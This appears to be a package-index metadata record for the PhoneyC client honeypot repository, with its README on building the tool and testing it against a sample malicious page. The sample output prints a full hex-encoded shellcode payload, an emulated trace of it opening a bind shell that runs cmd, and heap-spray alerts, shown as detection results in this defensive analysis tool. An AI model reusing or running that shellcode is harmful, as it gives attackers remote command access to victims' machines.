{"id":18023503,"url":"https://github.com/buffer/phoneyc","last_synced_at":"2025-03-27T00:30:38.214Z","repository":{"id":31195260,"uuid":"34755989","full_name":"buffer/phoneyc","owner":"buffer","description":null,"archived":false,"fork":false,"pushed_at":"2015-05-22T14:17:11.000Z","size":3395,"stargazers_count":16,"open_issues_count":0,"forks_count":22,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-03-22T17:23:32.576Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/buffer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"COPYING","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-04-28T21:08:22.000Z","updated_at":"2023-11-08T01:44:50.000Z","dependencies_parsed_at":"2022-09-09T05:11:25.595Z","dependency_job_id":null,"html_url":"https://github.com/buffer/phoneyc","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fphoneyc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fphoneyc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fphoneyc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fphoneyc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/buffer","download_url":"https://codeload.github.com/buffer/phoneyc/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245760536,"owners_count":20667886,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-30T07:09:45.951Z","updated_at":"2025-03-27T00:30:37.051Z","avatar_url":"https://github.com/buffer.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"Requirements:\n=============\n\n* libemu-svn\n  Homepage: http://libemu.carnivore.it/\n  Get the libemu code via Git and build it as documented on the reference\n  website \n    \n* curl\n  Homepage: http://curl.haxx.se/\n\n\nCompile the modules:\n====================\n\n(Optional) \nIf you need to compile the modules with a specific Python version you can \ndo it through the PHONEYC_PYTHON environment variable i.e. simply exporting \nthe variable this way before moving on \n\n    $ export PHONEYC_PYTHON=python2.5\n\nwill force the build system to use python2.5 instead of the default one. \nOtherwise skip this step.\n\n(Required)\n\n* Option #1\n\nBuild the code executing these commands \n\n    $ cd modules\n    $ make\n    $ make install\n\nPlease note that you don't need root privileges when running `make install'.\nThis option could cause you a few troubles at compile time. In such case\nplease refer to option #2.\n\n* Option #2\n\nThis is the most simple and straightforward way to install PhoneyC but it \nrequires root privileges. This option should be used as a fallback in case \noption #1 raises some troubles.\n\nIf you're running PhoneyC on one of the following Linux distributions\n\n\t* Debian\n\t* Ubuntu\n\t* Gentoo\n\nyou can build the code by simply running\n\n\t# make [debian|ubuntu|gentoo] \n\nand everything should be setup properly.\n\n\nTest the installation:\n======================\n\nIn order to test the installation simply run it on a sample malicious \npage in samples/ directory as shown below. \n\n    buffer@alnitak ~/honeynet/phoneyc $ python phoneyc.py file://samples/4158.html\n    [2011-01-17 11:32:47] [ALERT] NeoTracePro.TraceTarget overflow in arg0\n    Log written into: log/ad5048081277127857aad08e0bfd5e55\n\n====================================\n    |--------AID:1----------\n    |ATYPE:ALERT_SHELLCODE\n    |MESSAGE:Shellcode Detected!\n    |MISC:{}\n    |LENGTH:752\n    |SHELLCODE:\n    eb0359eb05e8f8ffffff494937494949494949494949494949494949515a6a625830423050416b41417232414241423242413042415838414250757a496b4c435a586b726d4d385969496f496f696f51704c4b324c446441344e6b4735474c4e6b634c7445325853315a4f4c4b726f75486e6b536f57503661486b63794e6b70346c4b64416a4e54714f304f696e4c6b344f30516444475a61395a544d44416f324a4b4964656b42746464713861655a456e6b636f65746551786b55366c4b666c504b4c4b514f476c4551786b7773546c6e6b4e69724c6134576c42414f3346514b6b31744c4b715350304c4b6150666c6c4b3430376c4c6d4c4b47306778414e73586e6e326e766e5a4c76304b4f48564246727375364358347374724248543732533472736f42746b4f7a707068584b586d4b4c774b30504b4f5a76536f6d594b5563564f716a4d533834426635724a4442396f385050686e3964494b456e4d30574b4f49465363305363633633536331535143304333634b4f4a7050667178496d524c435656334c494d316e7550684c64345a50706f374637396f4e36706a745043617635796f585061786d744e4d764e6d395277796f4e3633633365496f4a705358497537394e66704946374b4f4e366630763466346635696f48507a33424839777079784631695057396f6b665365696f68506536735a6534706631785173724d6f796d35317a427066394139584c6e694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b4f42553044596f7946636b70577272727146315051324a64417051327141454631396f6a7063584c6d6e395775584e4363496f6b66517a4b4f6b4f7567696f68504e6b3637396c4c4338445064496f5a764632496f7a7075386c306e6a4554714f46336b4f4e366b4f6e3062\n    |Now run it:\n    [{'rettype': 'HMODULE', 'retval': 1906376704, 'name': 'LoadLibraryA', 'arguments': [('LPCTSTR', 'lpFileName', ('', '', 'ws2_32'))]}, {'rettype': 'int', 'retval': 0, 'name': 'WSAStartup', 'arguments': [('WORD', 'wVersionRequested', 2), ('LPWSADATA', 'lpWSAData', 1244276)]}, {'rettype': 'SOCKET', 'retval': 66, 'name': 'WSASocket', 'arguments': [('int', 'af', 2), ('int', 'type', 1), ('int', 'protocol', 0), ('LPWSAPROTOCOL_INFO', 'lpProtocolInfo', 0), ('GROUP', 'g', 0), ('DWORD', 'dwFlags', 0)]}, {'rettype': 'int', 'retval': 0, 'name': 'bind', 'arguments': [('SOCKET', 's', 66), ('sockaddr_in *', 'name', ('', '', [('short', 'sin_family', 2), ('unsigned short', 'sin_port', 27901), ('in_addr', 'sin_addr', [('unsigned long', 's_addr', '0.0.0.0')]), ('char', 'sin_zero', '       ')])), ('int', 'namelen', 16)]}, {'rettype': 'int', 'retval': 0, 'name': 'listen', 'arguments': [('SOCKET', 's', 66), ('int', 'backlog', 2)]}, {'rettype': 'SOCKET', 'retval': 68, 'name': 'accept', 'arguments': [('SOCKET', 's', 66), ('sockaddr *', 'addr', ('', '', [])), ('int', 'addrlen', None)]}, {'rettype': 'int', 'retval': 0, 'name': 'closesocket', 'arguments': [('SOCKET', 's', 66)]}, {'rettype': 'BOOL', 'retval': -1, 'name': 'CreateProcess', 'arguments': [('LPCWSTR', 'pszImageName', ('', '', 'g\\x12')), ('LPCWSTR', 'pszCmdLine', ('', '', 'cmd')), ('LPSECURITY_ATTRIBUTES', 'psaProcess', None), ('LPSECURITY_ATTRIBUTES', 'psaThread', None), ('BOOL', 'fInheritHandles', 1), ('DWORD', 'fdwCreate', 0), ('LPVOID', 'pvEnvironment', None), ('LPWSTR', 'pszCurDir', None), ('LPSTARTUPINFOW', 'psiStartInfo', ('', '', [('DWORD', 'cb', 0), ('LPTSTR', 'lpReserved', 0), ('LPTSTR', 'lpDesktop', 0), ('LPTSTR', 'lpTitle', 0), ('DWORD', 'dwX', 0), ('DWORD', 'dwY', 0), ('DWORD', 'dwXSize', 0), ('DWORD', 'dwYSize', 0), ('DWORD', 'dwXCountChars', 0), ('DWORD', 'dwYCountChars', 0), ('DWORD', 'dwFillAttribute', 0), ('DWORD', 'dwFlags', 0), ('WORD', 'wShowWindow', 0), ('WORD', 'cbReserved2', 0), ('LPBYTE', 'lpReserved2', 0), ('HANDLE', 'hStdInput', 0), ('HANDLE', 'hStdOutput', 0), ('HANDLE', 'hStdError', 0)])), ('PROCESS_INFORMATION', 'pProcInfo', ('', '', [('HANDLE', 'hProcess', 4711), ('HANDLE', 'hThread', 4712), ('DWORD', 'dwProcessId', 4712), ('DWORD', 'dwThreadId', 4714)]))]}, {'rettype': 'DWORD', 'retval': 0, 'name': 'WaitForSingleObject', 'arguments': [('HANDLE', 'hHandle', 4712), ('DWORD', 'dwMilliseconds', -1)]}]\n\n====================================\n    |--------AID:2----------\n    |ATYPE:ALERT_HEAPSPRAY\n    |MESSAGE:Heapspray Detected!\n    |HIT:8\n    |MEMUSAGE:4193496\n    |LENGTH:4193496\n    |ENTROPY:0.0\n    |MISC:{'sledge_char': 'A', 'sec_char_cnt': 0, 'sledge_cnt': 4193496, 'sec_char': '\\x00'}\n\n====================================\n    |--------AID:3----------\n    |ATYPE:ALERT_HEAPSPRAY\n    |MESSAGE:Heapspray Detected!\n    |HIT:1\n    |MEMUSAGE:4193496\n    |LENGTH:4193496\n    |ENTROPY:0.0\n    |MISC:{'sledge_cnt': 4193496, 'sec_char_cnt': 0, 'sec_char': '\\x00', 'sledge_char': 'A'}\n\n====================================\n    |--------AID:4----------\n    |ATYPE:ALERT_HEAPSPRAY\n    |MESSAGE:Heapspray Detected!\n    |HIT:20\n    |MEMUSAGE:83884960\n    |LENGTH:4194248\n    |ENTROPY:0.00344388991898\n    |MISC:{'sledge_char': 'A', 'sec_char_cnt': 33, 'sledge_cnt': 4193514, 'sec_char': 'K'}\n\n\nRun it:\n=======\n\n    $ python phoneyc.py URL-you-what-to-examine\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbuffer%2Fphoneyc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbuffer%2Fphoneyc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbuffer%2Fphoneyc/lists"}